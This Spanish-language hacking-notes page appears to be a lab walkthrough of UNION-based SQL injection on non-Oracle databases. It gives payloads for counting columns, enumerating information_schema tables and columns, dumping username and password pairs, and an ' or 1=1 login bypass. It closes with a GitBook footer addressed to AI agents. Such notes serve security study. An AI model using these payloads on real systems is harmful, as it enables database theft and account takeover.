> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/sql-injection/non-oracle-database-enumeration.md).

# Enumeración de bases de datos no Oracle

### Ataque de inyección SQL, enumeración del contenido de la base de datos en bases de datos no Oracle

#### Contexto

* Parámetro vulnerable: `category` filtro (inyección a través de `WHERE`).
* La aplicación devuelve resultados SQL en la respuesta, permitiendo `UNION`extracción basada

#### Objetivo

* Identifica el nombre de la tabla que contiene las credenciales, descubre sus columnas, extrae `username` / `contraseña` pares y conéctate como `administrator`.

#### Metodología (fases concisas)

1. **Determina el número de columnas**/ Ejemplo:

   ```sql
   ' ORDER BY 2-- -
   ' ORDER BY 3-- -
   ```

* Aumenta el índice hasta provocar un error → conoce el número de columnas para `UNION`.

2. **Validar `UNION SELECT`**/ Ejemplo (2 columnas):

   ```sql
   ' UNION SELECT '1','2'-- -
   ```

* Ajusta a N columnas devueltas (usa `NULL` para columnas irrelevantes).

3. \*\* Enumerar tablas\*\* (base no Oracle — `information_schema`)

   ```sql
   ' UNION SELECT NULL, table_name
     FROM information_schema.tables
     WHERE table_schema = 'public'-- -
   ```

* Te permite listar tablas en el `public` esquema (compatible con Postgres/MySQL).

4. Enumerar las columnas de una tabla identificada

```sql
' UNION SELECT NULL, column_name
  FROM information_schema.columns
  WHERE table_schema = 'public' AND table_name = 'users_arejzy'-- -
```

* Reemplaza `users_arejzy` con la tabla descubierta.

5. Extraer contenido (volcado)

Ejemplo (columnas identificadas password/ qxbwwb, username/ lidnwi):

```sql
' UNION SELECT password_qxbwwb, username_lidnwi
  FROM users_arejzy-- -
```

* Ajusta el orden/tipo de las columnas según la solicitud vulnerable (usa `CAST`/`CONCAT`/`NULL` si es necesario).

6. Bypass / inicio de sesión

* Una vez recuperados el usuario = administrador y la contraseña, conéctate a través de la página de autenticación.
* Alternativamente, usa un payload de bypass de autenticación si la tabla no es accesible directamente (por ejemplo, username = ' or 1=1-- -), pero la exfiltración directa es preferible para la prueba.

#### Resultado esperado

* Lista de nombres de tablas, columnas y luego volcado de credenciales.
* Conexión exitosa como `administrator` usando credenciales exfiltradas.

#### Impacto

* Comprometer cuentas (escalada completa si es admin), extraer información sensible, cambio/eliminación de datos, posible extorsión.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/sql-injection/non-oracle-database-enumeration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
